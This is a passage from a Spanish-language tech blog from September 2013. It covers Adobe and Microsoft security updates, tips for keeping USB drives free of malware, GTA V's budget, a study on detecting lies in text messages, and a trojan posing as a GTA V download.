* Adobe Reader XI (11.0.03) y X (10.1.7) para Windows y Macintosh
* Adobe Acrobat XI (11.0.03) y X (10.1.7) para Windows y Macintosh
* Adobe Shockwave Player 12.0.3.133 para Windows y Macintosh

Más información:

APSB13-21 - Security updates available for Adobe Flash Player
http://www.adobe.com/support/security/bulletins/apsb13-21.html

APSB13-22 - Security updates available for Adobe Reader and Acrobathttp://www.adobe.com/support/security/bulletins/apsb13-22.html

APSB13-23 - Security update available for Adobe Shockwave Playerhttp://www.adobe.com/support/security/bulletins/apsb13-23.html

Adobe Flash Playerhttp://get.adobe.com/es/flashplayer/

Adobe AIRhttp://get.adobe.com/es/air/

Adobe Reader for Windowshttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows

Adobe Reader for Macintoshhttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Macintosh

Adobe Shockwave Playerhttp://get.adobe.com/shockwave/

Consejos para mantener los Flashdrive libres de malware.

Consejos para mantener los Flashdrive libres de malware.
 
malware-drive
 
En mis tiempos (30 años atrás), el malware no era tan sofisticado como en la actualidad, también había mucho menos y el medio de propagación eran los discos flexibles de 5 1/4” de 360 KB y posteriormente los de 3 1/2” de 720 KB. Actualmente el medio principal de propagación es Internet y en segundo lugar los dispositivos USB extraíbles.
Los cibercriminales no solo usan la Red para efectuar sus ataques. Cada vez es más común que encuentren nuevas vías para infectar a sus víctimas. De hecho, los dispositivos extraíbles como los USB o las tarjetas SD son el medio por el que se difunden el 30% de las infecciones de malware.
Un atacante puede infectar un equipo con un malware que se traspasa a un USB cuando se conecta al equipo con la esperanza de que ese mismo dispositivo se conecte a otro equipo para seguir difundiendo el malware. También se pueden utilizar para robar información directamente del equipo o, por su tamaño tan pequeño y compacto, puede perderse o que lo roben.
Dado que estos dispositivos aún se utilizan con frecuencia para compartir documentos con los compañeros de trabajo o fotos a nuestros amigos y familiares, etc. hay que tomar algunas precauciones para mantener los USB libres de virus. Éstas son las principales recomendaciones para evitar problemas con los dispositivos USB extraíbles:
1.- Configurar el sistema operativo para que no se ejecuten los archivos del USB
Si un atacante deja un USB infectado en una oficina para que la víctima lo recoja y lo enchufe al equipo, lo primero que tiene que hacer esta última es asegurarse de que ha configurado el software antivirus para que no abra y ejecute los archivos infectados.
2.- Actualizar el sistema operativo
Cada vez que el sistema operativo lance una actualización hay que descargarla. Los parches sirven para mejorar las imperfecciones y vulnerabilidades del software y si no se descargan se puede poner en peligro el equipo. Además, en el caso del malware de USB, hay que asegurarse de que el sistema operativo dispone de un parche contra los exploits autoejecutables para que el sistema no ejecute automáticamente ningún archivo del dispositivo extraíble.
3.- No copiar archivos ejecutables
Los archivos ejecutables pueden hacer que el equipo realice tareas siguiendo instrucciones cifradas. El daño que puede causar copiar este tipo de archivos desde una fuente desconocida es tremendo. Hay que evitar hacerlo. Lo mejor: descargar todo el software desde las páginas oficiales.
4.- Mantener los USB separados
Siempre se deben utilizar los USB procedentes de fuentes de confianza y nunca mezclar aquellos dispositivos personales con los profesionales. Es aconsejable mantener separados los datos laborables de la información personal, especialmente si el USB lo están utilizando diferentes personas.
Espero que esta información les sea de utilidad y si ya lo sabían, pónganlo en practica ya que muchos usuarios aun sabiendo lo que deben y no deben hacer con sus equipos, igual lo hacen ya sea por negligencia o por simple flojera...
 
 

miércoles, 11 de septiembre de 2013

GTA V, el videojuego más costoso de la historia.

GTA V, el videojuego más costoso de la historia.

 
 
Ya bastante que he comentado sobre GTA V y mucha gente se muestra escéptica cuando escuchan que el mundo de los videojuegos mueve ya casi tanto dinero como el del cine. Es normal, lo entiendo… Pero quizás ahora se lo crean cuando vean los datos revelados en torno a GTA V, considerado ya como el juego más caro de la historia.

Un presupuesto de 265 millones de dólares es lo que el nuevo título de Rockstar tiene para desarrollo, marketing y logística de GTA V. Posiblemente ya estén preparando un hueco en el libro de los Guinness… La nueva entrega de Grand Theft Auto supera con creces al presupuesto de otros grandes títulos como Skyrim, Crysis 3, Halo 3 Half Life, final Fantasy o el del propio 
GTA IV
... Ninguno de ellos llegó a los 100 millones de dólares. 
Lo más llamativo de los datos publicados de GTA V es que, excepto por Piratas del Caribe 3, GTA V supera también en presupuesto de desarrollo a las mayores producciones de Hollywood. Avatar, Harry Potter 6, John Carter, Avengers, Tron… ninguna de ellas ha costado tanto como el último juego de Rockstar.

millones dolares gta v

No olviden que de momento estamos hablando de costos de desarrollo y producción. Ahora falta por ver qué beneficios recoge GTA V tras su puesta a la venta. Está claro que el estudio ha tenido en cuenta el nivel de acogida de entregas anteriores para la dotación de este proyecto. Para que se hagan una idea, GTA IV ha vendido hasta la fecha de hoy más de 25 millones de copias… Como verán, está casi garantizado que dicha inversión se recupere y deje una buena tajada a sus creadores.
 

martes, 10 de septiembre de 2013

Estudio afirma que se pueden detectar las mentiras en un mensaje digital.

Estudio afirma que se pueden detectar las mentiras en un mensaje digital.
 
mensajes-texto-sms01.jpg
 
Ya con anterioridad comentaba que se podía detectar a alguien cuando dice una mentira cosa que es más fácil ya que se tiene a la persona en frente y se pueden apreciar muchos detalles como sus gestos, ¿pero que pasa cuando el mensaje es digital?.
 
Un estudio de la Universidad Brigham Young (EE UU) ha analizado lo que sucede cuando alguien miente en un mensaje digital, ya sea en una conversación de Whatsapp, en las redes sociales o en un SMS. Y han descubierto que se puede reconocer a un mentiroso porque tarda más en responder, edita más mientras escribe -borrando y reescribiendo- y sus mensajes son más cortos de lo habitual.

"Las conversaciones digitales son un terreno que fomenta el engaño, porque las personas pueden disimular y hacer que sus mensajes parezcan creíbles", subraya Tom Meservy, profesor de sistemas de la información y coautor del estudio que publica la revista ACM Transactions on Management Information Systems. Según el investigador, mientras que en un contexto presencial las personas pueden detectar mentiras con precisión en un 54% de las ocasiones, este porcentaje desciende en la comunicación digital al no poder oír la voz del interlocutor ni ver la expresión de su rostro o los gestos de sus manos.

En su experimento, Meservy y sus colegas trabajaron con más de un centenar de estudiantes universitarios que mantuvieron conversaciones con un ordenador que les formulaba decenas de preguntas. Al pedirles que mintieran en la mitad de sus contestaciones, los científicos comprobaron que tardaban un 10% más de tiempo en escribir las respuestas falsas, y que estas últimas eran editadas muchas más veces. Con estos conocimientos, augura Meservy, se podrían crear sistemas de conversación capaces de detectar mentiras en tiempo real. 

lunes, 9 de septiembre de 2013

Microsoft publicará catorce boletines de seguridad este martes.

Microsoft publicará catorce boletines de seguridad este martes.

Como adelanto de los futuros boletines de Microsoft de  este martes, se han publicado los productos afectados y el nivel de importancia de las vulnerabilidades detectadas que van a ser corregidas. Un total de 14 boletines, volumen bastante numeroso del que se extraen las siguientes clasificaciones por impacto:

Cuatro de los boletines son críticos, relacionadas con ejecución remota de código y afectando a toda la familia Windows, Office, Internet Explorer y Server.

De los pocos datos que han podido transcender hasta el momento, según Andrew Storms, director en CloudPassage, el segundo boletín corrige una ejecución remota de código en Outlook 2007/2010 a través del panel de previsualización de correo, por lo que se considera vital la aplicación de la próxima actualización.

Así mismo alerta de la gravedad en las vulnerabilidades recogidas en el primer boletín, que afectan a Sharepoint Server (2003, 2007, 2010 y 2013), debido a su carácter empresarial y crítico en el manejo de información delicada.

El resto de los boletines, 10 en total, son de nivel importante y relacionados con múltiples impactos: ejecución de código, elevación de privilegios, denegación de servicio o revelación de información, afectando a la familia Windows, .NET Framework y Office (entre ellos FrontPage y las versiones 2011 para Mac) siendo el boletín de Office el más numeroso hasta el momento.

Junto con estos boletines y como costumbre Microsoft también actualizará su herramienta "Microsoft Windows Malicious Software Removal Tool", disponible desde Windows Update, Microsoft Update, Windows Server Update Services y su centro de descargas.

Más información:

Microsoft Security Bulletin Advance Notification for September 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-sep

Microsoft to patch dangerous Outlook hack-by-preview bug next weekhttp://news.idg.no/cw/art.cfm?id=5E3E4071-FD49-9A93-FF2AD514E31B1D54

domingo, 8 de septiembre de 2013

Trojan.GenericKDV.1134859, un malware que se hace pasar por GTA V.

Trojan.GenericKDV.1134859, un malware que se hace pasar por GTA V.
 
 
En menos de dos semanas llegará al mercado GTA V, el juego más esperado por la comunidad gamer. Conscientes de la gran acogida que tendrá, ciberdelincuentes han utilizado el título de Rockstar para distribuir un archivo en la red BitTorrent que lejos de ser el ansiado juego consiste en malware que pone en riesgo la seguridad del usuario.
Se ha detectado un nuevo caso de malware que utiliza el nombre de algún contenido famoso para intentar engañar a sus víctimas e infectar sus equipos. En esta ocasión se trata de Grand Theft Auto V, la nueva obra de Rockstar que saldrá a la venta el 17 de septiembre y que se ha convertido en el juego más esperado del año ante las inmensas posibilidades que ofrecerá.

Los desarrolladores de este malware, el cual ha sido denominado Trojan.GenericKDV.1134859, se han apoyado en la red P2P BitTorrent para distribuir una supuesta copia del juego que dista mucho de serlo. Las consecuencias de la descarga y la instalación de este falso GTA 5 pueden ser graves, puesto que está diseñado para estafar a sus víctimas. Hay que remarcar que el juego solo saldrá en PS3 y Xbox 360, lo que añade más claridad a que se trata de un engaño.

La empresa de seguridad informática BitDefender advierte que durante el proceso de instalación se pide al usuario que inserte su número de teléfono con la excusa de mandarle al mismo un SMS con el número de serie del juego. Tras hacerlo, el usuario no solo no recibe ningún mensaje de este tipo sino que queda suscrito a un servicio de SMS de tarificación adicional con un coste de hasta 1 euro al día.

Además, la compañía de seguridad ha señalado que aquellos PC infectados pasan a formar parte de una botnet que reenvía de forma masiva mensajes a otros ordenadores mediante cuentas de redes sociales o servicios de mensajería robados. Igualmente, se modifica la navegación del usuario ya que se le intenta hacer creer que para acceder a determinadas páginas es necesario pagar para lo que se le pide tanto el número de tarjeta de crédito como la cuenta de Gmail o Outlook.

En definitiva, un compendio de riesgos de los que cabe alertar para evitar que se siga propagando este malware. Aunque sean muchas las ganas de tener en nuestras manos el nuevo GTA habremos de esperar con paciencia o podemos vernos embaucados en esta estafa.